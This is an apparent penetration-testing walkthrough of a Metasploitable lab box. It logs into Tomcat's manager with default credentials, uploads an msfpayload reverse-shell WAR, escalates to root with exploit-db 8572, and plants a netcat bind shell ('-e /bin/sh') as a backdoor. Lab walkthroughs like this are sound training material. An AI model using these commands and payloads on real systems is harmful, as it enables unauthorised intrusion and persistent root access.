In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.
Lets start with a Nmap scan…
As we can see the Tomcat manager requires a login. I know that by default the username and password is ‘tomcat’ lets try that.
we have logged into the manager application! Lets now take a look at generating a reverse shell!
msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war
^^^ This will generate our .WAR file which is an Apache Tomcat module.
Metasploit uses a random string for the .jsp page that is called in the war file… To find that we can extract the war file before we upload it.
As we can see ktipihbvrq.jsp is our .jsp filename. The syntax to extract this file is jar -xf <WAR file name>
^^^ This URL will kick off our reverse shell… Lets start up a listener…
nc -lvp 4444
^^^ Starts our netcat listener.
Lets run a tool called LinuxPrivChecker.py
So Linux Priv Checker tells us that http://www.exploit-db.com/exploits/8572/ is a good candidate to get us root. Lets try it out by following what the comments tell us to do with it…
First I will compile it. (My machine and the target are both x86 32bit)
so now that I used gcc 8572.c -o 8572 to compile the exploit, and I uploaded it. Lets pass it what was requested…
BUT first we need to create a run file like the says in the comments. <– This is why it is important to read all the info before starting to play with an exploit. Comments are gold when working with someone else’s code.
For this I am just going to create a simple netcat bind shell
echo “/bin/netcat -lvp 4447 -e /bin/sh” >>run
Again this is why reading the comments is important. If you read it you see it says “usually minus 1” in our case it was not minus 1 it worked with the exact PID.
And we have root!
As you can see we connected from our attacking box to the new bindshell. Because this was a local root exploit the script we created on /tmp/run was executed as root giving us a simple netcat root backdoor on port 4447.
Hope you enjoyed the video! Send feeback to firstname.lastname@example.org